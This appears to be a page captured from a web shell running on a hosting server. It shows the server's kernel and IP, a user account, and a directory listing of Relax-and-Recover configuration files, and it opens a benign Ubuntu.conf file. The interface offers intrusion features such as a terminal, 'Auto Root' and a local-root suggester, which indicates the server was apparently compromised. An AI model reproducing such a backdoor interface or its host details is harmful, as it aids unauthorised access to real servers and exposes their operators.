Linux ih01.iridiumhosting.com 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64
LiteSpeed
Server IP : 67.227.241.211 & Your IP : 216.73.216.226
Domains :
Cant Read [ /etc/named.conf ]
User : dustinhy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
MXB /
rear /
usr /
share /
rear /
conf /
Delete
Unzip
Name
Size
Permission
Date
Action
Debian
[ DIR ]
drwxr-xr-x
2026-04-01 09:39
GNU
[ DIR ]
drwxr-xr-x
2026-04-01 09:39
Ubuntu
[ DIR ]
drwxr-xr-x
2026-04-01 09:39
examples
[ DIR ]
drwxr-xr-x
2026-04-01 09:39
templates
[ DIR ]
drwxr-xr-x
2026-04-01 09:39
Linux-i386.conf
48
B
-rw-r--r--
2026-04-01 09:39
Linux-ia64.conf
498
B
-rw-r--r--
2026-04-01 09:39
Linux-ppc64.conf
1.03
KB
-rw-r--r--
2026-04-01 09:39
Linux-ppc64le.conf
1.27
KB
-rw-r--r--
2026-04-01 09:39
Linux-s390.conf
383
B
-rw-r--r--
2026-04-01 09:39
SUSE_LINUX.conf
113
B
-rw-r--r--
2026-04-01 09:39
Ubuntu.conf
1.23
KB
-rw-r--r--
2026-04-01 09:39
default.conf
236.39
KB
-rw-r--r--
2026-04-01 09:39
Save
Rename
PROGS+=( initctl MAKEDEV ) # Exclude paths which will trigger warnings about non-existing symlink targets COPY_AS_IS_EXCLUDE+=( /usr/share/misc/magic ) ##### # TCG Opal 2 PBA system only: Include Plymouth graphical boot animation OPAL_PBA_PROGS+=( plymouth plymouthd ) OPAL_PBA_COPY_AS_IS+=( /etc/alternatives/*plymouth* /usr/lib/x86_64-linux-gnu/plymouth /usr/share/plymouth /usr/share/fonts/truetype/ubuntu ) # NOTE: 'build/GNU/Linux/100_copy_as_is.sh' auto-detects shared libraries referenced by executables from COPY_AS_IS # but fails to consider shared libraries (*.so) from COPY_AS_IS. Adding those to LIBS gets them covered. OPAL_PBA_LIBS+=( /usr/lib/x86_64-linux-gnu/plymouth/*.so /usr/lib/x86_64-linux-gnu/plymouth/renderers/*.so ) vt_handoff="$(grep --extended-regexp --only-matching 'vt.handoff=[0-9]+' /proc/cmdline)" if [[ -n "$vt_handoff" ]]; then # vt.handoff triggers an Ubuntu-specifc mechanism to ensure a smooth boot splash transition # Cf. https://help.ubuntu.com/community/vt.handoff # Only do this on systems where it was originally enabled, otherwise the PBA might boot into a black screen. # (In case of the latter, pressing ESC helps). OPAL_PBA_KERNEL_CMDLINE+=" $vt_handoff" fi OPAL_PBA_USE_SERIAL_CONSOLE="No"